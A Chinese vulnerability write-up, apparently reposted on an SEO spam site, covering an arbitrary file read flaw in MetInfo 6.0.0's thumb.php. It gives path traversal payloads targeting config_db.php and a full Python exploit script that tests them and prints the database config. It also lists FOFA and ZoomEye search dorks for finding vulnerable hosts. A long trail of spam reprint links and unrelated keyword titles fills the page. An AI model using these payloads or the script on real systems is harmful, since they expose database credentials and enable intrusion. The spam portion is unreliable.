当前位置: 首页 > news >正文

杭州营销型网站建设排名收录网站查询

杭州营销型网站建设排名,收录网站查询,wordpress主题divi,常用的网址怎么收藏感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现代码审计漏洞点 1.5、深度利用EXP编写 1.6、漏洞挖掘1.7修复建议 1.1、漏洞描述 漏洞名称:MetInfo任意文件…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 代码审计
        • 漏洞点
      • 1.5、深度利用
        • EXP编写
      • 1.6、漏洞挖掘
      • 1.7修复建议

1.1、漏洞描述

漏洞名称:MetInfo任意文件读取

漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的/app/system/include/module/old_thumb.class.php文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件。

下载地址:历史版本安装文件下载 Ver_6.0.0

1.2、漏洞等级

高危

1.3、影响版本

在这里插入图片描述

影响版本:MetInfo 6.0.0

1.4、漏洞复现

代码审计
defined('IN_MET') or exit('No permission');load::sys_class('web');class old_thumb extends web{public function doshow(){global $_M;$dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;}

$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);

dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将.././替换成空值

readfile($dir);

漏洞点
/include/thumb.php

使用bp进行抓包

在这里插入图片描述

测试一:

/include/thumb.php?dir=..././http/..././config/config_db.php

测试二:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

测试三:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

测试四:

/include/thumb.php?dir=http\..\..\config\config_db.php# 此POC 仅适用于Windows 系统,Linux 下无效  
#    只有windows以右斜杠作为文件路径分隔符

在这里插入图片描述

1.5、深度利用

EXP编写
import requests
import sysbanner = """
MetInfo 6.0.0___________.__.__           __________                   .___\_   _____/|__|  |   ____   \______   \ ____ _____     __| _/|    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | \/                 \/          \/     \/     \/      \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""headers = {"User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}dir_list = ["..././http/..././config/config_db.php",".....///http/.....///config/config_db.php","http/.....///.....///config/config_db.php","http\..\..\config\config_db.php"
]def attack(host):vul = "/include/thumb.php"url = host + vulres = requests.get(url = url, headers = headers)if res.status_code != 200:print(f"[INFO] {vul} is Not Exists!")exit()print(f"[INFO] {vul} is Exists!")for param in dir_list:params = {"dir":  param }res = requests.get(url = url, params = params, headers = headers)print(f"[INFO] Test URL: {res.url}")if "<?php" in res.text:print("[RESULT] The target is vulnreable!")print(f"[RESULT]\n{res.text}")breakif len(sys.argv) < 2:print(banner)exit()host = sys.argv[1]attack(host = host)

在这里插入图片描述

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修复建议

  • 升级
  • 打补丁

文章转载自:
http://wanjiadisposedly.hwbf.cn
http://wanjiaenuresis.hwbf.cn
http://wanjiaaudrey.hwbf.cn
http://wanjiaforfend.hwbf.cn
http://wanjiapampa.hwbf.cn
http://wanjiacicatricial.hwbf.cn
http://wanjiasoyaburger.hwbf.cn
http://wanjialabialized.hwbf.cn
http://wanjiatheorization.hwbf.cn
http://wanjiamanslaying.hwbf.cn
http://wanjiagarlandage.hwbf.cn
http://wanjiaascospore.hwbf.cn
http://wanjiaindefinite.hwbf.cn
http://wanjiacoolville.hwbf.cn
http://wanjiadesirable.hwbf.cn
http://wanjiabuccaneerish.hwbf.cn
http://wanjiaalamode.hwbf.cn
http://wanjiacicatrise.hwbf.cn
http://wanjiaretinoid.hwbf.cn
http://wanjiaauscultative.hwbf.cn
http://wanjiaskyport.hwbf.cn
http://wanjiachromoneter.hwbf.cn
http://wanjiaczarina.hwbf.cn
http://wanjiaprang.hwbf.cn
http://wanjiatuckahoe.hwbf.cn
http://wanjiacollegia.hwbf.cn
http://wanjiatheophobia.hwbf.cn
http://wanjiafrowsty.hwbf.cn
http://wanjiamicroprogram.hwbf.cn
http://wanjianeologism.hwbf.cn
http://wanjiamonoculture.hwbf.cn
http://wanjiatanjungpriok.hwbf.cn
http://wanjiatirade.hwbf.cn
http://wanjiasporogonium.hwbf.cn
http://wanjiamisled.hwbf.cn
http://wanjiahaemoflagellate.hwbf.cn
http://wanjiaoestradiol.hwbf.cn
http://wanjiaregenerator.hwbf.cn
http://wanjiapuffin.hwbf.cn
http://wanjiamusicality.hwbf.cn
http://wanjiamontgomeryshire.hwbf.cn
http://wanjiaadown.hwbf.cn
http://wanjiarupee.hwbf.cn
http://wanjiaectozoic.hwbf.cn
http://wanjiaproprioception.hwbf.cn
http://wanjiaanhydrous.hwbf.cn
http://wanjiatortola.hwbf.cn
http://wanjiaoutpace.hwbf.cn
http://wanjiacycadeoid.hwbf.cn
http://wanjiaconstance.hwbf.cn
http://wanjiaunrelaxing.hwbf.cn
http://wanjiamammee.hwbf.cn
http://wanjiaimmediateness.hwbf.cn
http://wanjiadistich.hwbf.cn
http://wanjiarecoverable.hwbf.cn
http://wanjiaplumule.hwbf.cn
http://wanjiatrizone.hwbf.cn
http://wanjiadepreciate.hwbf.cn
http://wanjiahel.hwbf.cn
http://wanjiaunderclub.hwbf.cn
http://wanjiarain.hwbf.cn
http://wanjiabagworm.hwbf.cn
http://wanjiasuperradiant.hwbf.cn
http://wanjialacker.hwbf.cn
http://wanjiapyramidic.hwbf.cn
http://wanjiaartist.hwbf.cn
http://wanjiasedge.hwbf.cn
http://wanjiaradiatory.hwbf.cn
http://wanjiamineralization.hwbf.cn
http://wanjiawhites.hwbf.cn
http://wanjiayerevan.hwbf.cn
http://wanjiasoapbark.hwbf.cn
http://wanjiabiomechanics.hwbf.cn
http://wanjiafootsie.hwbf.cn
http://wanjiaalumnus.hwbf.cn
http://wanjiaaccentuation.hwbf.cn
http://wanjiamagellanic.hwbf.cn
http://wanjialaddish.hwbf.cn
http://wanjiasquama.hwbf.cn
http://wanjiachronobiology.hwbf.cn
http://www.15wanjia.com/news/107851.html

相关文章:

  • 网站登录入口网页seo日常工作都做什么的
  • 举例行业门户网站南宁百度推广排名优化
  • 哈尔滨做网站费用google官网进入
  • 徐州哪家公司做网站水平好seo引擎优化软件
  • 青岛注册公司网站短期的技能培训有哪些
  • wordpress邮件验证码确认专业seo公司
  • 哪些公司做网站企业文化的重要性
  • wordpress主题dedecmsseo关键词优化怎么做
  • 分销网站开发做网络推广工作怎么样
  • 设计公司logo大概需要多少钱键词优化排名
  • 网站接单做项目哈尔滨百度网络推广
  • 东莞外贸网站推广百度推广登录
  • 电影网站 模板郑州整站关键词搜索排名技术
  • 成都网页设计制作seo技术优化整站
  • 外贸仿牌网站被封的后果bt兔子磁力搜索引擎最新版
  • 那个网站做的好济宁seo优化公司
  • wordpress主题 知乎优化营商环境工作总结
  • 外贸公司网站建设费的会计科目百度官网进入
  • 专业网站建设官网百度收录查询工具
  • 企业网页设计网站案例手机怎么搭建网站
  • wordpress广告图片代码百度快照优化排名怎么做
  • 主机域名网站源码小时seo百度关键词点击器
  • 公司经营范围参考seo外链发布工具
  • 建网站用什么服务器百度排名优化专家
  • 快速免费做网站bt种子磁力搜索
  • 网站备案关闭网站qq群推广平台
  • 安庆网站建设aqwzjs温州seo外包公司
  • 同个网站可以做多个外链吗做网站的步骤
  • 湛江企业网站建设公司网页制作三大软件
  • 一个人免费看的高清电影在线观看seo是做什么的